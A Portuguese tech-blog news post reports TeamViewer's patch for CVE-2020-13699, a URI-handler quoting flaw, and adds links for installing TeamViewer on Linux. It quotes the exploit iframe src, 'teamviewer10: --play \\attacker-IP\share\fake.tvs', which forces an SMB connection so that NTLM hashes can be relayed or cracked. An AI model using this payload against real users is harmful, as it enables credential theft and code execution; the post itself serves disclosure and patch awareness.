TeamViewer corrigiu um erro que permite que invasores acessem PC’s

E o TeamViewer corrigiu um erro que permite que invasores acessem PC’s. Confira as novidades e veja como instalar esse app de acesso remoto no Linux.

TeamViewer é um software gratuito para controle remoto através da Internet. Com ele você consegue estabelecer uma conexão com qualquer computador ou servidor em todo o mundo em apenas alguns segundos e a partir dela você pode controlar o computador de seu parceiro à distância como se estivesse sentado na frente dele.

Durante uma sessão do TeamViewer você pode transferir arquivos de ou para computadores remotos. Para isso você usa arrastar e soltar, copiar e colar através da área de transferência ou armazenamento na nuvem, para copiar arquivos individuais e pastas inteiras em poucos segundos e de qualquer localidade.

No programa também é possível enviar arquivos para contatos na sua lista de computadores e contatos, sem precisar estabelecer uma conexão. Ou seja, servidores FTP e limite de tamanho para anexos nos e-mails não serão mais problema para você.

Agora, o TeamViewer corrigiu uma vulnerabilidade que poderia permitir que os invasores estabelecessem silenciosamente uma conexão com o seu computador e explorassem ainda mais o sistema.

TeamViewer corrigiu um erro que permite que invasores acessem PC’s

TeamViewer corrigiu um erro que permite que invasores acessem PC’s

Quando explorado com sucesso, esse bug deixava um ator remoto não autenticado executar código no seu PC com Windows ou obter hashes de senha (por exemplo, para quebrar por força bruta).

Designado CVE-2020-13699, o bug de alta gravidade se enquadra em uma categoria especial de vulnerabilidades de segurança, apelidada de Unquoted Search Path or Element (ou, Caminho ou elemento de pesquisa não citada) (CWE-428).

Eles tiram vantagem do fato de que os argumentos passados ​​para um programa não são “citados”. Isso pode fazer com que um programa trate os argumentos como comandos diretos, em vez de um valor de entrada.

Para executar um ataque típico, o usuário precisa navegar para uma página maliciosa que carrega um iframe no navegador web – possivelmente oculto ou tão pequeno quanto um pixel, para evitar ser visto por um surfista casual.

O iframe se carrega usando o esquema de URI “teamviewer10:”, que informa ao navegador Web para iniciar o aplicativo TeamViewer instalado na sua máquina.

Os esquemas de URI personalizados são usados ​​por aplicativos instalados localmente que desejam capacitar o usuário para iniciá-los a partir de seu navegador da web.

Por exemplo, os URLs iniciados com “skype:” no seu navegador da Web iniciariam o Skype. Outros aplicativos comumente usados ​​como Slack, Zoom e Spotify usam estruturas de URI semelhantes.

Para explorar essa falha do TeamViewer, o invasor definiria o atributo src do iframe como ‘teamviewer10: –play \\attacker-IP\share\fake.tvs’.

Este comando instrui o aplicativo TeamViewer instalado localmente a se conectar ao servidor do invasor por meio do protocolo Server Message Block (SMB).

“Um invasor pode incorporar um iframe mal-intencionado em um site com uma URL criada (iframe src = ‘teamviewer10: –play \\attacker-IP\share\fake.tvs’) que inicie o cliente de desktop do TeamViewer Windows e o force a abra um compartilhamento SMB remoto.”, disse Jeffrey Hofmann, engenheiro de segurança da Praetorian que descobriu a falha.

Além disso, devido ao modo como os compartilhamentos SMB funcionam, e é a máquina da vítima iniciando uma conexão com o compartilhamento SMB do invasor, o invasor não precisa saber a senha do usuário. Eles seriam automaticamente autenticados e receberiam acesso.

“O Windows executará a autenticação NTLM ao abrir o compartilhamento SMB e essa solicitação poderá ser retransmitida (usando uma ferramenta como respondedor) para execução de código (ou capturada para quebra de hash)”, explicou Hofmann.

Segundo o engenheiro, várias versões do TeamViewer foram impactadas como evidente pelos esquemas de URI que poderiam ser usados ​​no ataque.

“Isso afeta os manipuladores de URI teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 e tvvpn1.”

A correção para a falha foi bastante simples. Tudo o que era necessário era que a entrada fosse “citada” para ser tratada como um ‘valor’ e não como um comando do sistema pelo aplicativo TeamViewer instalado localmente.

“Este problema foi corrigido citando os parâmetros passados ​​pelos manipuladores de URI mencionados, por exemplo, URL:teamviewer10 Protocol “C:\Program Files (x86)\TeamViewer\TeamViewer.exe” “%1″”.

Em uma declaração do TeamViewer divulgada recentemente, a empresa confirmou que o bug existia em várias versões do TeamViewer em execução no Windows e anunciou um patch.

“Hoje, estamos lançando algumas atualizações para o TeamViewer 8 a 15, para a plataforma Windows. Implementamos algumas melhorias no manuseio de URI relacionadas ao CVE 2020-13699”.

A empresa agradeceu ainda ao engenheiro de segurança por relatar com responsabilidade a falha.

“Obrigado, Jeffrey Hofmann, da Praetorian, por seu profissionalismo e por seguir um modelo de divulgação responsável. Agradecemos que você tenha nos contatado e que possa confirmar a correção de suas descobertas na versão mais recente.”

Os usuários do Windows do TeamViewer devem considerar a atualização para uma ou mais versões corrigidas, que incluem: 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 e 15.8.3

Como instalar ou atualizar o TeamViewer

Para instalar a versão mais recente do TeamViewer nas principais distribuições Linux, use esse tutorial:
Como instalar o TeamViewer no Linux manualmente
Como instalar o TeamViewer no Ubuntu, Debian, Fedora e derivados

O que está sendo falado no blog

Post Views: 259

Deixe um comentário

Sair da versão mobile